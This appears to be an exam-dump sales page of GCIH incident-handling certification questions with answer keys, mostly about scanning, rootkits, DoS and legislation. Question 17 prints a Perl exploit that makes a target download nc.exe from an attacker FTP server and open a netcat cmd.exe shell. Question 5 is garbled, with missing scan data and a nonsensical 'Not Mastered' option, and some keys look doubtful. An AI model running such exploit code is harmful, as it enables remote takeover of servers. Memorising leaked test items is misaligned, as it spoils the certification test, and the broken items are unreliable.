GCIH | All About Free GCIH Latest Exam

Want to know Passleader GCIH Exam practice test features? Want to lear more about GIAC GIAC Certified Incident Handler certification experience? Study Accurate GIAC GCIH answers to Renew GCIH questions at Passleader. Gat a success with an absolute guarantee to pass GIAC GCIH (GIAC Certified Incident Handler) test on your first attempt.

Also have GCIH free dumps questions for you:

NEW QUESTION 1
Which of the following tools can be used for stress testing of a Web server?
Each correct answer represents a complete solution. Choose two.

  • A. Internet bots
  • B. Scripts
  • C. Anti-virus software
  • D. Spyware

Answer: AB

NEW QUESTION 2
Which of the following types of rootkits replaces regular application binaries with Trojan fakes and modifies the behavior of existing applications using hooks, patches, or injected code?

  • A. Application level rootkit
  • B. Hypervisor rootkit
  • C. Kernel level rootkit
  • D. Boot loader rootkit

Answer: A

NEW QUESTION 3
Adam, a malicious hacker, wants to perform a reliable scan against a remote target. He is not concerned about being stealth at this point.
Which of the following type of scans would be most accurate and reliable?

  • A. UDP sacn
  • B. TCP Connect scan
  • C. ACK scan
  • D. Fin scan

Answer: B

NEW QUESTION 4
Which of the following is executed when a predetermined event occurs?

  • A. Trojan horse
  • B. Logic bomb
  • C. MAC
  • D. Worm

Answer: B

NEW QUESTION 5
Adam, a malicious hacker is running a scan. Statistics of the scan is as follows:
Scan directed at open port: ClientServer


Solution:


Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

NEW QUESTION 6
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He wants to perform a stealth scan to discover open ports and applications running on the We-are-secure server. For this purpose, he wants to initiate scanning with the IP address of any third party. Which of the following scanning techniques will John use to accomplish his task?

  • A. RPC
  • B. IDLE
  • C. UDP
  • D. TCP SYN/ACK

Answer: B

NEW QUESTION 7
Which of the following tools will you use to prevent from session hijacking?
Each correct answer represents a complete solution. Choose all that apply.

  • A. OpenSSH
  • B. Rlogin
  • C. Telnet
  • D. SSL

Answer: AD

NEW QUESTION 8
Which of the following strategies allows a user to limit access according to unique hardware information supplied by a potential client?

  • A. Extensible Authentication Protocol (EAP)
  • B. WEP
  • C. MAC address filtering
  • D. Wireless Transport Layer Security (WTLS)

Answer: C

NEW QUESTION 9
Which of the following types of channels is used by Trojans for communication?

  • A. Loop channel
  • B. Open channel
  • C. Covert channel
  • D. Overt channel

Answer: C

NEW QUESTION 10
John works as an Ethical Hacker for Exambible Inc. He wants to find out the ports that are open in Exambible's server using a port scanner. However, he does not want to establish a full TCP connection.
Which of the following scanning techniques will he use to accomplish this task?

  • A. TCP FIN
  • B. TCP SYN/ACK
  • C. TCP SYN
  • D. Xmas tree

Answer: C

NEW QUESTION 11
Which of the following programs can be used to detect stealth port scans performed by a malicious hacker?
Each correct answer represents a complete solution. Choose all that apply.

  • A. nmap
  • B. scanlogd
  • C. libnids
  • D. portsentry

Answer: BCD

NEW QUESTION 12
Adam works as a Senior Programmer for Umbrella Inc. A project has been assigned to him to write a short program to gather user input for a Web application. He wants to keep his program neat and simple. His chooses to use printf(str) where he should have ideally used printf("%s", str).
What attack will his program expose the Web application to?

  • A. Format string attack
  • B. Cross Site Scripting attack
  • C. SQL injection attack
  • D. Sequence++ attack

Answer: A

NEW QUESTION 13
You run the following bash script in Linux:
for i in 'cat hostlist.txt' ;do
nc -q 2 -v $i 80 < request.txt done
Where, hostlist.txt file contains the list of IP addresses and request.txt is the output file. Which of the following tasks do you want to perform by running this script?

  • A. You want to put nmap in the listen mode to the hosts given in the IP address list.
  • B. You want to perform banner grabbing to the hosts given in the IP address list.
  • C. You want to perform port scanning to the hosts given in the IP address list.
  • D. You want to transfer file hostlist.txt to the hosts given in the IP address list.

Answer: B

NEW QUESTION 14
Which of the following are the primary goals of the incident handling team?
Each correct answer represents a complete solution. Choose all that apply.

  • A. Freeze the scene.
  • B. Repair any damage caused by an incident.
  • C. Prevent any further damage.
  • D. Inform higher authorities.

Answer: ABC

NEW QUESTION 15
Which of the following US Acts emphasized a "risk-based policy for cost-effective security" and makes mandatory for agency program officials, chief information officers, and inspectors general (IGs) to conduct annual reviews of the agency's information security program and report the results to Office of Management and Budget?

  • A. The Electronic Communications Privacy Act of 1986 (ECPA)
  • B. The Fair Credit Reporting Act (FCRA)
  • C. The Equal Credit Opportunity Act (ECOA)
  • D. Federal Information Security Management Act of 2002 (FISMA)

Answer: D

NEW QUESTION 16
Which of the following types of attacks slows down or stops a server by overloading it with requests?

  • A. DoS attack
  • B. Impersonation attack
  • C. Network attack
  • D. Vulnerability attack

Answer: A

NEW QUESTION 17
Adam, a malicious hacker performs an exploit, which is given below:
#####################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host ­C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?

  • A. Creates a share called "sasfile" on the target system
  • B. Creates an FTP server with write permissions enabled
  • C. Opens up a SMTP server that requires no username or password
  • D. Opens up a telnet listener that requires no username or password

Answer: D

NEW QUESTION 18
John works as a Network Security Professional. He is assigned a project to test the security of www.we-are-secure.com. He establishes a connection to a target host running a Web service with netcat and sends a bad html request in order to retrieve information about the service on the host.
GCIH dumps exhibit
Which of the following attacks is John using?

  • A. Sniffing
  • B. Eavesdropping
  • C. War driving
  • D. Banner grabbing

Answer: D

NEW QUESTION 19
Which of the following Denial-of-Service (DoS) attacks employ IP fragmentation mechanism?
Each correct answer represents a complete solution. Choose two.

  • A. Land attack
  • B. SYN flood attack
  • C. Teardrop attack
  • D. Ping of Death attack

Answer: CD

NEW QUESTION 20
......

100% Valid and Newest Version GCIH Questions & Answers shared by Dumps-hub.com, Get Full Dumps HERE: https://www.dumps-hub.com/GCIH-dumps.html (New 328 Q&As)